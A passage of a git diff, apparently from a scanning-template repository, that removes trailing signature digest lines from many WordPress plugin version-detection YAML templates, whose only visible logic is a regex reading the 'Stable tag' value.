b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index b8414082e7..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204318ab8448ddf2dcb5346d4d490c03ec9fbee4ec84097cf9a7d39b0c14e44f3d02203927c07cf2386eedf4b22937ae4b38c7686bb69a90ba72230c3a66404487c372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index deb89ccb20..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100944ed51ae6eac9274eb2d6198fe14518a7d515ebe82b65aeaae644f4197214a102205be6a34296a68008a8a3eddc6c20e06bef0c67595f7bed0d23a31d3c1ff78d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 8a239e3d2c..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c4c187ab800f0e487435afe58920fb2fc9a2e389b647635c91e5bdc5b9a1f9802210092b88cf586750e2b1e1d7015d683c45108f2589937dd71d75a5e2a60632cc8da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 70d8ce0139..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083f6388dda2c5435cf1b084ce12cbc2cd467bb81b1471c299fea7e10f547f89f022036cd04204476d7f679f7d29d7c98889a9525a2b2c0bfb597e9b3be5829ef8921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 3a9b7cc765..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207888c79c3f8bbe037b4543e1a782c43e00f6d76c19d3a5f35e2623f6dac81c3d022100947616c4b48ec56ce324050fc28aa0ec6c8c995a4ddfb07fd7809ef36635e648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index df36afbdf3..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d4f02764d9154f08527c0224bc1494ce4f3cc3467047c3f3b4d63ca8d761404502203c00dc71964c9d7b016491cb66e465e1fd56629096d6daeeec89b478e20311e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 7fc9cf64b6..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bff3ed45d4b54188f141f5ca8918517cfbcf06817046ca3f2fd17f17434d26d602206186b206647d2950282f27df2e06b08c146bedcf53991d59ac7a54cf1a9c7360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index adc5fd0009..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201045a0684f2a88ad02cc7cbca2ac865a77daed9a3d64ed69c8c363f6a9cd2666022100aa0d5c3a8df3743643b3f571b2bd26643ac71eb885a89c7b8be3a18622b44799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 7e4a14a26e..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e46c527c618f41d62f3110883f5c4b9a87da5529071fbd6c24c13084fbf9f2d022100b7ac2fb3dd1eb0de5e66d9db052dec9cfb47023d2ce634f2241fa638a52a1eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b29dafbe06..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210083b34d2da63ff39d24b7bbcbf2da8e6baf7c550a3690623fabc98e9fb393b5fc022100857950a86fa1feb415ff51963a866d87ce0bae4119ca197b4631406a65d947f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 747ee6fd54..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9132ad3f6975103589a71e9d0579abcb47c49257cf422e88eeb5510120d887b02207ecdb74b70ab3c6e41d9c68ab0b8a756bd18acb069e25bc73b930ff55f79684b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8dde0cbd95..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100809e489f4e9c448c77440f3ec24d59c005fce9a22e2e68f6d722b3b7eb96d1eb022100908cd09e399b99a79710905216f50113be5fa262bf9651017ba359390ffc752c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 26bce0d694..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d68200b74b9b1438a0c7a657c01af7f42bbe4db41245c63bc70356621cbfe857022100b70affe11b665a84b202b44c415690d663ec2ff186b5e8df7f97726a698bcb43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e705922a7d..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220730e4285b5210b43dc311c864a61d513c5f13e17f9b7c9750364c140a0b4d4ae022100ee2144656ba5360582849462639dbf8e74a04969d49e19d5fef32ea55dfb807b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index a9c4f0cc91..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aac819c325389d9ed67b3f1d41a108e6cb2d28b8d800f268f38cc7a4414feaf702205f85552600b9fd738742ffe3bc4fbc76498f41462066862d849f22c559f3708d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 8890a6b6b3..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf52bcf8a196b25652a1404dc9c8c6a3156253ef241351c4ab0913e3367e1c66022100df424e1e1057606ebcdd0ff2173b38a5f438d9c0ff4b398509995e3c2da9fa52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 260f2508d5..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202945850999f3552bbb78728b7b5edf42da81d12ece6506db1224290f597820d9022013badff80366f3cca92ffed225bd5bfbcb77f8c5b04afc6df33e04bc46982ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 4c0967a2b6..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220277e2e2dd6915fca70235adae1866dac3ebef01922d26602b6c2e3748002dcca022002c4d600974d01ae651e31036f1b2564ff3c211473560e31634f09a80b998409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 96cb6610fa..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200728bc8a0362dcc769b52c7b7d67a80e6ae9da86e680c05c31d4c74e9b29035702210087022e6c58987d2538b10f9f8b8a2eb5e880ff9185dbff9e303d97aa0f2d72dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index bf57279460..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220517a18806f7d8c4920e2931a2f0240c13696c913882cbe4bced5918920a5c47a022100e43e5f3d7f040df5123fc582085b83c847959d44fb7fb5a4c7185ac681c25a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 29b3997ea9..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093f18ddc5c92a66cc2dc7c82a3d0d6ddae985f60692e0b11435fd397d03115a50220039bd3e061b7e3e72e89663bd4d89e0504654d4553611cc5f0fa6674c0fd74e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e3182c7d0b..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa9530103e5692ea858b173e289b5094c8ec3aa6b5c77a85c810fed21800befc02210095182f5d1c0c86959fee75b5b8b99ee8c317608fe10cf03173a547f9b45d6d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index b4f73a78c3..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207254f45f7a919abeedc6971f4764f6f74024241c9ecaa6caf4e72eb95f70bf21022030644d099a60289f06120899d63e8d6ccf673ebd99732e104cfc8153b2a2c82a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 8521d21fd3..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c8485ac6ca3fec9aacfabfb79ae70dbc63c62ec8944226232e6089c0bb13d98022100a542ac00cea101fee8619daf68a95265484d09a9f2f30685108b033842dd9d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 1e90acced6..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb8b5a2af4f171122c869e4248e05ea424df3e0a70e487f21e999553de4e3e2902210099a3e149120660a8bf7bc4b105325d64aee5d9a39dad3583330503be9c308c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 96bce8e207..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206aa31f5a7c461fdb586f0f94616da0c544cbf572e816a0ee54dbd82584054acb0220362d2d059139dd50a13ddb18b9f34802273007a88dd69ef9b0af8b32ab6a7cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index cbef84ab18..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b67a8eb3ab982444d972277721eaaa816034227cd7f1cec1e497da7f1ad93b8e022023421474ceb2f97861521f3234c6942e15cc70b31d69af39d39e1145f3130d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 76c9a9d881..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d98de5a5c82535d8a6be58a049e13e82de4bf6619b5d288752aab9a92fd6b0300220747e63b1e42496cd2897f8b0c2a4a51938c6e3d76389d6c14317afe3c79f35ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 280aedace7..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6dc2274f62ace475d7a7fb78b71f801748b7db7179bba7d77c8de4f3fa2758402210085d262e944ef60d47d5845f776990d87b77b99a6538464fbff8d9a8293b1e715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index b1adacc027..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c8fce15b934e7492906a477dfec26fdb1dc36e123da155277acb51de8f44dc30221008acd82e317a5345f68eecd37dd89be30f900f8afe7de3a535d619534306162ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8568f474cf..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb01ea92204f91202b691d03988c80104f51f4c301df1bf665b0618d886f715202202d961c6f1b65c8190f471cec49ed7507bd9d122bb0857d5ede7301c7428fdd9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 29e822a935..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f04a0d8b53b7d072940afb5091605213420fdb54372d9ed19ce6197d62ac88c022027cbebaf625acb58698b1f7054f0dc4204367ab952b53dbd7b3e2a2ac1ed071f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 4a519136bd..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073f80502456076e346d8eeebade48c26e985cc49c9f3498e1293e1982e5591b402204b962fb099854d4d9e0b13a75f5ab3994f71ff32227218346b21cff2ab08316e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index f735255758..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fba4b2fb6de0f83082992a68d7c5acee3ea4534dd585a69e0dda8f2b4cd7d21022019390c7e2583319dab432fac1816d936e16217cacf58a8bdacabbb735953b588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index e7d258b4a8..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203df4bf94adfb5e0082834fea320c0f8052a9d7dee75c80319a1c39d489de5bd9022100c6964a74b39e78d74474e9995ba0e53e8773fdc133b2c69d086cf1a5813e66af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index b9ffabff75..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220167ed6516a0f74a949f0dbe52c3145bd82c0e9eff9fd5227045cd94d4f17fef302205c4ef23691dc3f7f97b81c094f6ad24e6fb300c00c58ed59a6199c491b3c731c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 4832a8faed..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd4ec944e58c7c27a0896788f1537a52225b61398869a8ca0467899514113c70022100bfa57243f408e462a2d167b60c8b58826792f8ee7e40c3b6ff18f02cf21bc398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 65862d2931..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100927615d8efc9f8702cafd280686217ec2ffd22fe14b48221c6619a9803d810e202206555db4dc70105da4ed56aa99525ab68553157117137de414f40e3cc30ecc49a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d89766b178..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022018dd08954dd0f4af713809da8bbc99edd3a3d0f5945b988bb034a96fdabce3b502206407b947b2b9571fe8419f7ef7069ba1e9da203fb5b062c1a0dc4c8733dd045f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 7c06b24278..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201544db8b5f1524a0a026f669a511aa6f1c66ea3304cb0cf8b6b965565846e174022100e4933a318d244f78d0b6063c6ceac1b4ef2707a6b4799ae4f4b74e2f3b1ec999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 7507d80ecb..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df001779331528ac6b79e581d26f847265f77a859949dc7e27a3ed43cad8860c022100b700fd203160394646a6caddfdf6a65bfabadf206840c7c259240977eb57ccba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0f1b890c5c..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee2abb89b1b3c7d85d4eeb4ab129a0f411ef313d7b204b308a875994c8112a6a02206493cb51eae3e8f24635456dcf509d1f10a2036064b401fc641e3d04b7a6a917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index c1faa80403..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e75dd699176aa90e335485e5a8139bf6402269eb9e9f692cc4d7d67237659f40022100a14dd1825698696c1abf02dc210f9a79b3d9d583a317dddc6a287f5b5979febc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 16299c0c33..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eeffc8a5e872f4c2741ee735cd616098da2fd26fa5fe1bc8dbfd72c9e2660e1f022100cce47abeea9ca9c6b9a30166230a52d12ab725a9f57d65821235ead0bedeb5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 13d7878d7d..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe68fe3b7b4de6e82974e305b025757c7354f5726bba3c6a64aa9a12837d3ffb02207399b0e15a1a32d3f18057f2022efd0b2ef2f7988dd440c7f93d9d0d1c429205:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index bed58adb32..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f73848862fb54cf09ee07a562ac78e98c08abed02f010b0c7ed9b06a651e918d022100aa92ac5230d924290b46e234070dc9341e5b1228e58b32724c461b911afb6190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index d0036d7d28..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 